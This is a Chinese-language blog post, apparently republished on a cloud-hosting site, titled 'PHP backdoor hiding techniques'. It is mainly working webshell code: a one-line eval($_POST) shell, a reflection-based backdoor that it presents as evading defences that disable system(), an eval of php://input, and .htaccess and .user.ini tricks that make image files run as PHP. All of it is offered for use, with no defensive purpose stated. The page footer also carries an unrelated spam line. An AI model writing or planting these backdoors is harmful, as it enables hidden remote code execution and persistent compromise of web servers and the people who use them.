溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

php后門隱藏技巧

發布時間:2020-08-07 09:53:04 來源:網絡 閱讀:10001 作者:serverxx0 欄目:web開發

一句話 and 大馬

 phpspy  菜刀一句話<?php@eval($_POST['cmd']);?>


反射后門

<?php

   $func = new ReflectionFunction($_GET[m]);

   echo $func->invokeArgs(array($_GET[c]));

?>

調用如x.php?m=system&c=whoami
后門也可繞過某些檢測禁用system函數的防護系統

php后門隱藏技巧

php:input

php://input是用來接收post數據(這里有php://input的介紹)

<?php

@eval(file_get_contents('php://input'))

?>

 

Post提交 system('whoami');

php后門隱藏技巧

.htaccess(webserver支持)

可以設置任意后綴也可以設置UTF7編碼格式shell

AddType  application/x-httpd-php     .jpg

然后再傳一個JPG結尾的shell,訪問即可執行了

.user.ini(fastcgi配合)

 動態修改php.ini配置文件

User.ini

auto_prepend_file:指定在每個PHP頁面執行前所要執行的代碼

auto_prepend_file=demo.gif (每個頁面都會加載demo.gif)


php后門隱藏技巧

php后門隱藏技巧


使用php://input (不需要上傳額外的文件)(需要自行打開allow_url_include=on 默認為off)

缺點:不支持.user.ini修改allow_url_include (在PHP5時是PHP_INI_SYSTEM。 從PHP5.2.0起可用。)

php后門隱藏技巧



http://php.net/manual/zh/ini.list.php

http://php.net/manual/zh/configuration.changes.modes.php


附件:http://down.51cto.com/data/2366063
向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女